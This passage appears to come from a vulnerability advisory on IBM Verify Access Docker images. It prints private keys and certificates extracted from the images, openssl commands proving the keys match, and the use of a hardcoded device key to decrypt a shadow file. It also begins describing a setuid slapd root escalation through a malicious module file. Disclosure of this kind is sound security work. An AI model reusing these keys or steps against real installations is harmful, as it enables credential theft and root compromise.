iWC72WysdBedH5DUM39cRiorYz/E5rFIKWz8c4Fz4sx0IkTqM2JvS1frtvPgMTTV\n    PvowBcLrLIIBj3ZktheAijCtB7g0FR8EBJpJvY3nPYYA08akeJ2wIrV/AdXiMGR+\n    dJXnJRmoVI6tdk/Y9xRfUuahqQKBgQDsp+v5PkMWYyRsja6cjN4K9bExRbPCMyXo\n    o3VisQXQYnVdKJE86g+PMiwY4KJksZ3ZPYduB4Hn+9qcKWRXkg/VbInE9+TxwBOT\n    E4cf1bUibtNZEF4JeV7/FE+K76RgxROufXpRlrTqlmzblIBIeA14sGCC/3unb6tV\n    mfCGe18l7QKBgQCs0g6vj2otrnMRYZR8nyJq7sJEU8S7nqNdh/bf/7j3owkdjjOM\n    m9K8LKuIrge8yoBe1mCmylo0PGcb6oc+Yn+VuoDLoI1k1rX/zzOzkFaZ1pqAkuki\n    xuw5NUX1ufOi5sqohxYe0edSPryFmXYX0EoI0NanQB+foNjrZvtvmbP98QKBgAHG\n    0PKyEPbeD6vw9FqghBo49feUumC+2Y4BjCQNiCmkU5U7dLusVimRCtu09AMlgjXb\n    TGT7EXKYZW++r84ofo3vnqkn40QdWQhFoUIP7KgxhMyqXspbaucnU+GLIwTG9frd\n    Xkm2g+0u6+pKFxx0KkW5rT/OgzMil3qxCSk5S+GRAoGAVzyS/rD6YInD7/vWUqwm\n    ttgKBm1d/uL2fMzx0KCnuKd5gJwfLIx9wDR4862VyWxOof8quqAWAthSGgg99Bjj\n    dujkG+fMEu+pYaxTmte0HSC4I+QTkQrOup4wtwVFz2t+0yPlmneQXmJ+K5Wu9ClR\n    uxhPVbNJYbPOs02by37UXn8=\n    -----END PRIVATE KEY-----\n    Bag Attributes\n        friendlyName: encKey\n        localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 \n    Key Attributes: \u003cNo Attributes\u003e\n    -----BEGIN PRIVATE KEY-----\n    MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDsJ4YkXiuJVyuD\n    N2Ibykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lM\n    x1k7AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6\n    szaEMmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrw\n    G9Iissr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzM\n    DrlEPELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3\n    R5JZZbEtAgMBAAECggEABB9RCrysBAAZuFSREk47s+NE5JGSN3klHESHzinuZphv\n    9piID0BX0/Ar6uo4aO+GXrj9fqHZi2ikR/12yW0NpjYhcMsr1geMTNkJXPex+wwJ\n    eQWaoEXeBk3bbGbfMzqrxUh/QgyJqpu48wZ7ROSIqF5DMYVPElkkSAHWmdvgUnQi\n    T5m+F+eq5dGYx82V/COXKzOKUd714o7uL6bPqnFbZlQLGbDnUruFLLNsktrVhMCH\n    f2n7vj2irRyehFB9iJWoQYzZRYnt7ZZwaiC5tM1FH08Ba9KWhKioV0euO8t2ojkt\n    VW3EKTx5qrxnKvchlgDzb9neb/p9PtFUy/AuB/3n6QKBgQDzv99rQUVVLsaTFK8A\n    UWzXfEB+su0vxK5Q8hpgF9EdOGLZQtTpl8/xIj5Np7OqVclQA7usx6t9mcJwjkdH\n    blUubDs8MOcvbxfjOos3LdZ4egOfiac7N4nMkjh1XUvUt0bvkNO+GtgDgsS16EiE\n    X9fsafsbkQYqsNd1qag4u5M9xQKBgQD4Be5dLZ0A62qQlaQA5Vl8bp8woL843qKC\n    PYGIEf5/sQX3oYRhM2En6RI4nMt6htPn7WB0T7vCCi+XEACnruAUJFEyZARpeGHG\n    5jx3p4p3l/QUxCgdzXceEJTjabesOOZSuPazjaj1RWoAU7fRTwnG+0msq15zlkqG\n    UjVnqsoESQKBgBheXl/CrsPNYVzi/HvzqAYDDg+co8nax/KfwbNJrkZVlMxTuiWA\n    X/GjkscAtR2aZf3x4ZlsfOCZtq66CrZBeZKij2l9Gh/L4398It7pXj+9Mw+IG4f4\n    DXa+R5a0NRiXGihpOkIPPPlc4X2uM1HIozWngstGvG8YLvI8e+zwE9BhAoGAf649\n    +YXjz3dh0rDWTwfCu4YPOW9nQZWLP1T+e9gXlhDBq6tghNF4cJ1RngdJ0Pfb2wee\n    ogHx/IBV44R/cdNa08OmcTR/+PPaEhSwiECdzddR9ebNaBo/+iA7JZ9kyKo6F9fU\n    WLbShgGIAkcW2A/CTsdKNDO8WfDCyMdFaurHONECgYA0e/5TN/+AGLktUd7VIlOC\n    5FCHkAGl4iHJn/3v5r8yfh55Otf+K9vIUrEGW9XEouIofLMapbKqxiTD7YCbrbsy\n    NyoRMUtmBWnh7yrWkl/gvLIRsAw1R248Q1uxLb0JytRyf/8vW0YOK1grDxnijULH\n    arClGP/McDNH4FD3S9dgJQ==\n    -----END PRIVATE KEY-----\n\n\nAnd the corresponding certificates:\n\n    Bag Attributes\n        friendlyName: ca\n        localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF \n    subject=C = us, O = ibm, OU = isam, CN = ca\n    issuer=C = us, O = ibm, OU = isam, CN = ca\n    -----BEGIN CERTIFICATE-----\n    MIIDNDCCAhygAwIBAgIINKDsXZO6zrowDQYJKoZIhvcNAQELBQAwNzELMAkGA1UE\n    BhMCdXMxDDAKBgNVBAoTA2libTENMAsGA1UECxMEaXNhbTELMAkGA1UEAxMCY2Ew\n    IBcNMTkwMzIxMDQ1NzAzWhgPMjEwMTA1MTEwNDU3MDNaMDcxCzAJBgNVBAYTAnVz\n    MQwwCgYDVQQKEwNpYm0xDTALBgNVBAsTBGlzYW0xCzAJBgNVBAMTAmNhMIIBIjAN\n    BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuXdVJAQqU5iu+NNUakipeNkiJwNA\n    fM4Gy4GRvhz6J4iIMM27uJUSUhRmho57iR9XHFj78bg7b+Udul+BIZy/UXsCYhw0\n    6tUUZz/16kI2t7h8LCguMlJcr4QXF/hXKEys6uMu9uGWbNhiDPkOHeDrFwKJkM90\n    3hFk/bcq+4AoAyfFt1r6RFBOpqb5tDj7oxYrwDPVrOm2O83Ga6o1ODXLf/4KvapW\n    bijFmp+vLxPsjKiQJAgi4emBvBAPk1P00D+HAngiIlAQQugNUQjGwgPbewIFk5ST\n    8bj03YExEy0Vw5TCVoVsbkxlrZF660l2liMAU5OF1X3itsZGLETzRZgWdQIDAQAB\n    o0IwQDAfBgNVHSMEGDAWgBRXaoj3HRsUC6I+wha3FcN9ng+jDDAdBgNVHQ4EFgQU\n    V2qI9x0bFAuiPsIWtxXDfZ4PowwwDQYJKoZIhvcNAQELBQADggEBAG+bhfLKKtyj\n    Lrr32TZA1NRNMaSsIy5u8J8EkNf17NExfDnbgCB9omz1MPG2wIwdnzKHoIT+IqyP\n    Dtg2A21pKeJXDLObBcTgHoFR6zNJw9Ph8k7AygxaqPldVB/PvsCacMRvlGVwFJ8b\n    dClu6wAfVZv+oQDM+9zNIDVk39alp/T7dtvVqm1nCLH4C3E3r6KQw6pXOFtI5641\n    bAyK45l9kJSw+B4TF/mpL1+HNYv1baxkiSiwlgts+7SO2fAmrWE19MukWfj2oHLr\n    gs3PLYVjz8MnZJ9SBwXXGYFaV0qS9T8wLYe9+5aSK6CT5rjo5ZAncKh4bxyYEW75\n    cGAPLNhMRL8=\n    -----END CERTIFICATE-----\n    Bag Attributes\n        friendlyName: encKey\n        localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 \n    subject=C = US, O = IBM, OU = GSKIT, CN = encKey\n    issuer=C = US, O = IBM, OU = GSKIT, CN = encKey\n    -----BEGIN CERTIFICATE-----\n    MIIEJjCCAw6gAwIBAgIIEuizp4Aw/w8wDQYJKoZIhvcNAQEFBQAwPDELMAkGA1UE\n    BhMCVVMxDDAKBgNVBAoTA0lCTTEOMAwGA1UECxMFR1NLSVQxDzANBgNVBAMTBmVu\n    Y0tleTAeFw0xOTAzMjEwNDU2NTlaFw0yOTAzMTkwNDU2NTlaMDwxCzAJBgNVBAYT\n    AlVTMQwwCgYDVQQKEwNJQk0xDjAMBgNVBAsTBUdTS0lUMQ8wDQYDVQQDEwZlbmNL\n    ZXkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDsJ4YkXiuJVyuDN2Ib\n    ykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lMx1k7\n    AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6szaE\n    MmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrwG9Ii\n    ssr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzMDrlE\n    PELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3R5JZ\n    ZbEtAgMBAAGjggEqMIIBJjCCASIGHCsGAQSD3OuTf4Pc65N/g9zrk3+r7CeDsWQC\n    pwkEggEARE7WVCtMEiBaqLgkERWOycU2QormaqloW2kdYi0iZT7NV/3tw0DNbcGK\n    pWdWfqtM4BM2x7Zq1ilGkK3NtGDnvRTBvrCFt0j/fU80/B9yBoELS0OWqKDkLiZi\n    enYORA427Y4JNYiRWngQCBPboqqp1oOB03dxujVH85W/3AniYol4fZBiUdYMfhWi\n    0sKxy5El/XDpYsA8w6ZQ0jz3/uQkNzY96A6QdO/4wB9P4YpKrl3XTKYGMtwoSW4b\n    QbXu2DOWvPZHxkXLizkeEk9/j+DC27nA7/ZIBNRV4pqOg2lo+7Po9XwwNyE2+1o2\n    4/2lwxPxDvGFYP05F78XHPEal8LgPTANBgkqhkiG9w0BAQUFAAOCAQEAuw8iMAY5\n    CD5l52ei96Aalm+mdVc+r7BkfYMHR2yjzpF9EZS16fd5dPAiq1DHSWZeZAxjB7dD\n    8jVS5CzMwB+07S8Yy9OgPD9tB4ittv5SK+oQDJwK9AQhIJXppznpb/GDEV63xdVB\n    +NBLvKLVxhvgd/SR8hsjJRdCKRk+zk45EuUpMGlq/ke65tjVXjwjxrVASeVkfmnM\n    Q+AVrvXc2Ywnby4JJYXD+JVEEkJvxdHgQbLwAJAs6jYFHd/zo7ZPQuZt8jO9n64/\n    GE55CDW8KBWsIw61KCPCCD1qOV03+mAT7xnDepzb8BkMrA3QUbEbriKkt5I7/2Gj\n    DxxuUpf+LWXLEw==\n    -----END CERTIFICATE-----\n\n\nAfter the analysis of the certificates and the private keys, we were able to extract a CA private key and a private encryption/decryption key:\n\n    kali-docker# openssl x509 -in ca.pem -text -noout -modulus\n    Certificate:\n        Data:\n            Version: 3 (0x2)\n            Serial Number: 3792290772900564666 (0x34a0ec5d93baceba)\n            Signature Algorithm: sha256WithRSAEncryption\n            Issuer: C=us, O=ibm, OU=isam, CN=ca\n            Validity\n                Not Before: Mar 21 04:57:03 2019 GMT\n                Not After : May 11 04:57:03 2101 GMT\n            Subject: C=us, O=ibm, OU=isam, CN=ca\n            Subject Public Key Info:\n                Public Key Algorithm: rsaEncryption\n                    Public-Key: (2048 bit)\n                    Modulus:\n                        00:b9:77:55:24:04:2a:53:98:ae:f8:d3:54:6a:48:\n                        a9:78:d9:22:27:03:40:7c:ce:06:cb:81:91:be:1c:\n                        fa:27:88:88:30:cd:bb:b8:95:12:52:14:66:86:8e:\n                        7b:89:1f:57:1c:58:fb:f1:b8:3b:6f:e5:1d:ba:5f:\n                        81:21:9c:bf:51:7b:02:62:1c:34:ea:d5:14:67:3f:\n                        f5:ea:42:36:b7:b8:7c:2c:28:2e:32:52:5c:af:84:\n                        17:17:f8:57:28:4c:ac:ea:e3:2e:f6:e1:96:6c:d8:\n                        62:0c:f9:0e:1d:e0:eb:17:02:89:90:cf:74:de:11:\n                        64:fd:b7:2a:fb:80:28:03:27:c5:b7:5a:fa:44:50:\n                        4e:a6:a6:f9:b4:38:fb:a3:16:2b:c0:33:d5:ac:e9:\n                        b6:3b:cd:c6:6b:aa:35:38:35:cb:7f:fe:0a:bd:aa:\n                        56:6e:28:c5:9a:9f:af:2f:13:ec:8c:a8:90:24:08:\n                        22:e1:e9:81:bc:10:0f:93:53:f4:d0:3f:87:02:78:\n                        22:22:50:10:42:e8:0d:51:08:c6:c2:03:db:7b:02:\n                        05:93:94:93:f1:b8:f4:dd:81:31:13:2d:15:c3:94:\n                        c2:56:85:6c:6e:4c:65:ad:91:7a:eb:49:76:96:23:\n                        00:53:93:85:d5:7d:e2:b6:c6:46:2c:44:f3:45:98:\n                        16:75\n                    Exponent: 65537 (0x10001)\n            X509v3 extensions:\n                X509v3 Authority Key Identifier: \n                    57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C\n                X509v3 Subject Key Identifier: \n                    57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C\n        Signature Algorithm: sha256WithRSAEncryption\n        Signature Value:\n            6f:9b:85:f2:ca:2a:dc:a3:2e:ba:f7:d9:36:40:d4:d4:4d:31:\n            a4:ac:23:2e:6e:f0:9f:04:90:d7:f5:ec:d1:31:7c:39:db:80:\n            20:7d:a2:6c:f5:30:f1:b6:c0:8c:1d:9f:32:87:a0:84:fe:22:\n            ac:8f:0e:d8:36:03:6d:69:29:e2:57:0c:b3:9b:05:c4:e0:1e:\n            81:51:eb:33:49:c3:d3:e1:f2:4e:c0:ca:0c:5a:a8:f9:5d:54:\n            1f:cf:be:c0:9a:70:c4:6f:94:65:70:14:9f:1b:74:29:6e:eb:\n            00:1f:55:9b:fe:a1:00:cc:fb:dc:cd:20:35:64:df:d6:a5:a7:\n            f4:fb:76:db:d5:aa:6d:67:08:b1:f8:0b:71:37:af:a2:90:c3:\n            aa:57:38:5b:48:e7:ae:35:6c:0c:8a:e3:99:7d:90:94:b0:f8:\n            1e:13:17:f9:a9:2f:5f:87:35:8b:f5:6d:ac:64:89:28:b0:96:\n            0b:6c:fb:b4:8e:d9:f0:26:ad:61:35:f4:cb:a4:59:f8:f6:a0:\n            72:eb:82:cd:cf:2d:85:63:cf:c3:27:64:9f:52:07:05:d7:19:\n            81:5a:57:4a:92:f5:3f:30:2d:87:bd:fb:96:92:2b:a0:93:e6:\n            b8:e8:e5:90:27:70:a8:78:6f:1c:98:11:6e:f9:70:60:0f:2c:\n            d8:4c:44:bf\n    Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675\n    kali-docker# openssl rsa -in ca.key -modulus -noout       \n    Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675\n    \n    kali-docker# openssl x509 -in encKey.pem -text -noout -modulus\n    Certificate:\n        Data:\n            Version: 3 (0x2)\n            Serial Number: 1362536419271180047 (0x12e8b3a78030ff0f)\n            Signature Algorithm: sha1WithRSAEncryption\n            Issuer: C=US, O=IBM, OU=GSKIT, CN=encKey\n            Validity\n                Not Before: Mar 21 04:56:59 2019 GMT\n                Not After : Mar 19 04:56:59 2029 GMT\n            Subject: C=US, O=IBM, OU=GSKIT, CN=encKey\n            Subject Public Key Info:\n                Public Key Algorithm: rsaEncryption\n                    Public-Key: (2048 bit)\n                    Modulus:\n                        00:ec:27:86:24:5e:2b:89:57:2b:83:37:62:1b:ca:\n                        47:7c:ea:27:94:7c:8a:a5:44:9e:2d:d1:9e:34:09:\n                        79:1f:71:4a:12:61:f1:9f:11:49:74:bc:66:bf:85:\n                        15:7a:74:18:2b:d1:cb:ec:3f:55:2e:87:c9:4c:c7:\n                        59:3b:00:5d:8b:64:1f:f7:1d:fe:36:32:23:78:6f:\n                        50:52:84:29:14:ff:f5:03:8f:0d:c8:24:36:e5:a4:\n                        3c:40:b3:af:b0:34:72:e3:67:74:e6:bb:88:fc:58:\n                        f1:fa:b3:36:84:32:62:ca:74:03:95:5f:78:f8:a4:\n                        49:5c:a1:3c:2c:a3:34:7e:17:ed:57:05:ca:7d:1b:\n                        e9:e1:23:29:af:4d:ab:24:5b:2f:10:8b:61:07:97:\n                        e3:36:a9:ba:f0:1b:d2:22:b2:ca:f5:c1:7d:ca:9c:\n                        8e:61:c6:f1:c0:b4:47:e5:c0:5b:b5:a8:87:10:15:\n                        d1:28:fe:71:ba:fb:8e:53:ce:1b:88:51:37:a9:d6:\n                        37:2a:0c:a4:c5:b2:ec:cc:0e:b9:44:3c:42:c6:a8:\n                        75:61:91:8a:d4:68:26:14:b6:21:0e:8d:95:dc:13:\n                        a1:ee:7f:2d:74:9c:48:e8:de:70:11:c8:a9:48:a2:\n                        6d:c0:f4:68:bc:aa:c7:2a:f5:78:77:47:92:59:65:\n                        b1:2d\n                    Exponent: 65537 (0x10001)\n            X509v3 extensions:\n                1.3.6.1.4.999999999.999999999.999999999.718375.55524.2.5001: \n                    DN.T+L. Z..$.....6B..j.h[i.b-\"e\u003e.W...@.m...gV~.L..6..j.)F....`........H.}O4..r...KC.....\u0026bzv.D.6...5..Zx...........wq.5G......b.x}.bQ..~.......%.p.b.\u003c..P.\u003c...$76=...t....O..J.].L..2.(In.A...3...G.E..9..O.........H..U....ih....|07!6.Z6.........`.9.........=\n        Signature Algorithm: sha1WithRSAEncryption\n        Signature Value:\n            bb:0f:22:30:06:39:08:3e:65:e7:67:a2:f7:a0:1a:96:6f:a6:\n            75:57:3e:af:b0:64:7d:83:07:47:6c:a3:ce:91:7d:11:94:b5:\n            e9:f7:79:74:f0:22:ab:50:c7:49:66:5e:64:0c:63:07:b7:43:\n            f2:35:52:e4:2c:cc:c0:1f:b4:ed:2f:18:cb:d3:a0:3c:3f:6d:\n            07:88:ad:b6:fe:52:2b:ea:10:0c:9c:0a:f4:04:21:20:95:e9:\n            a7:39:e9:6f:f1:83:11:5e:b7:c5:d5:41:f8:d0:4b:bc:a2:d5:\n            c6:1b:e0:77:f4:91:f2:1b:23:25:17:42:29:19:3e:ce:4e:39:\n            12:e5:29:30:69:6a:fe:47:ba:e6:d8:d5:5e:3c:23:c6:b5:40:\n            49:e5:64:7e:69:cc:43:e0:15:ae:f5:dc:d9:8c:27:6f:2e:09:\n            25:85:c3:f8:95:44:12:42:6f:c5:d1:e0:41:b2:f0:00:90:2c:\n            ea:36:05:1d:df:f3:a3:b6:4f:42:e6:6d:f2:33:bd:9f:ae:3f:\n            18:4e:79:08:35:bc:28:15:ac:23:0e:b5:28:23:c2:08:3d:6a:\n            39:5d:37:fa:60:13:ef:19:c3:7a:9c:db:f0:19:0c:ac:0d:d0:\n            51:b1:1b:ae:22:a4:b7:92:3b:ff:61:a3:0f:1c:6e:52:97:fe:\n            2d:65:cb:13\n    Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D\n    kali-docker# openssl rsa -in encKey.key -modulus -noout       \n    \n    Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D\n    kali-docker# \n\nIt is also possible to decrypt the `shadow.enc` file of a live instance using the hardcoded `device_key.kdb`:\n\n    kali-docker# file shadow.enc                                                                                             \n    shadow.enc: data\n    kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/lib64:/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64  /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/sbin/isva_decrypt shadow.enc\n    kali-docker# cat shadow.enc \n    root:!!$6$[REDACTED]:19255:0:99999:7:::\n    bin:*:18367:0:99999:7:::\n    daemon:*:18367:0:99999:7:::\n    adm:*:18367:0:99999:7:::\n    lp:*:18367:0:99999:7:::\n    sync:*:18367:0:99999:7:::\n    shutdown:*:18367:0:99999:7:::\n    halt:*:18367:0:99999:7:::\n    mail:*:18367:0:99999:7:::\n    operator:*:18367:0:99999:7:::\n    games:*:18367:0:99999:7:::\n    ftp:*:18367:0:99999:7:::\n    nobody:*:18367:0:99999:7:::\n    dbus:!!:19115::::::\n    systemd-coredump:!!:19115::::::\n    systemd-resolve:!!:19115::::::\n    tss:!!:19115::::::\n    postgres:!!:19151::::::\n    ldap:!!:19151::::::\n    admin:$6$[REDACTED]:19255:0:99999:7:::\n    www-data:*:14251:0:99999:7:::\n    ivmgr:!!:19151:0:99999:7:::\n    cluster::19151:0:99999:7:::\n    pgresql:!!:19151:0:99999:7:::\n    nfast:!!:19151:0:99999:7:::\n    tivoli:!!:19151:0:99999:7:::\n    isam:!!:19151:1:90:7:::\n\n\nAn attacker can easily decrypt the encrypted files inside the snapshot files. These snapshots contain an `openldap.zip` file containing the OpenLDAP configuration, keytabs, passwords, SSL certificates and private keys. \n\nThe encryption mechanism, based on hardcoded keys, is ineffective and provides a false assumption of security. \n\n\n\n## Details - Local Privilege Escalation using OpenLDAP\n\nIt was observed that the official IBM Docker image ibmcom/verify-access contains a Local Privilege Escalation vulnerability. \n\nThe binary `slapd`, used to run OpenLDAP has incorrect permissions, allowing any user to run `slapd` as root. An attacker can run `slapd` as root and specify a malicious configuration file that will run code as root. \n\nUsing a static analysis, the file system has been extracted and the `usr/sbin/slapd` program is `root:$group` and `4755`:\n\n    kali-docker# docker images\n    REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE\n    ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB\n    ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB\n    ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB\n    ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB\n    \n    kali-docker# ls -la _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd\n    -rwsr-sr-x 1 root user 1916768 Jun  8 01:30 _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd\n\nWhile checking on a live system, we can confirm the permissions `4755` (suid bit) are used in the verify-access instance. The owner is `root:ivmgr`:\n\n    [isam@verify-access log]$ ls -la /usr/sbin/slapd\n    -rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd\n    [isam@verify-access log]$\n\nBy default, `slapd` allows to load external modules (to execute code). These .la files contain information about shared libraries that will be loaded within slapd. \n\nContent of `/etc/openldap/slapd.conf`:\n\n    # Load dynamic backend modules:\n    # modulepath    /usr/lib/openldap\n    # moduleload    back_bdb.la\n    # moduleload    back_ldap.la\n    # moduleload    back_ldbm.la\n    # moduleload    back_passwd.la\n    # moduleload    back_shell.la\n    moduleload syncprov.la\n\nIt is possible to load malicious modules as root using a specific configuration .la file. This will allow a local attacker to get a Local Privilege Escalation as root. For example, we can find a default file that we can change into a malicious file by updating the libdir option to another directory:\n\n    kali-docker# cat _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/usr/lib64/openldap/syncprov.la\n    # syncprov.la - a libtool library file\n    # Generated by libtool (GNU libtool) 2.4.6\n    #\n    # Please DO NOT delete this file!\n    # It is necessary for linking the library. \n    